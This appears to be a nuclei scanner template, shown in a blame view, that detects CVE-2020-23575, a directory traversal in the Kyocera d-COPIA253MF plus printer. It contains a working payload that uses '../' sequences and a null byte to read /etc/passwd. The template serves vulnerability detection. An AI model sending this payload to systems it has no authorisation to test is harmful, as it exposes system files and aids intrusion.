nuclei-templates/http/cves/2020/CVE-2020-23575.yaml

45 lines
1.3 KiB
YAML
Raw Normal View History

id: CVE-2020-23575
info:
name: Kyocera Printer d-COPIA253MF - Directory Traversal
author: 0x_Akoko
severity: high
description: Kyocera Printer d-COPIA253MF plus is susceptible to a directory traversal vulnerability which could allow an attacker to retrieve or view arbitrary files from the affected server.
2023-09-06 12:22:36 +00:00
remediation: |
Apply the latest firmware update provided by Kyocera to fix the directory traversal vulnerability.
reference:
- https://www.exploit-db.com/exploits/48561
- https://nvd.nist.gov/vuln/detail/CVE-2020-23575
- https://www.kyoceradocumentsolutions.com.tr/tr.html
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
cvss-score: 7.5
cve-id: CVE-2020-23575
cwe-id: CWE-22
2023-07-11 19:49:27 +00:00
epss-score: 0.01879
2023-08-31 11:46:18 +00:00
epss-percentile: 0.86948
2023-09-06 12:22:36 +00:00
cpe: cpe:2.3:o:kyocera:d-copia253mf_plus_firmware:-:*:*:*:*:*:*:*
metadata:
max-request: 1
2023-07-11 19:49:27 +00:00
vendor: kyocera
product: d-copia253mf_plus_firmware
tags: cve,cve2020,printer,iot,lfi,edb
http:
- method: GET
path:
- "{{BaseURL}}/wlmeng/../../../../../../../../../../../etc/passwd%00index.htm"
matchers-condition: and
matchers:
- type: word
part: body
words:
- "root:.*:0:0:"
- "bin:.*:1:1"
condition: or
- type: status
status:
- 200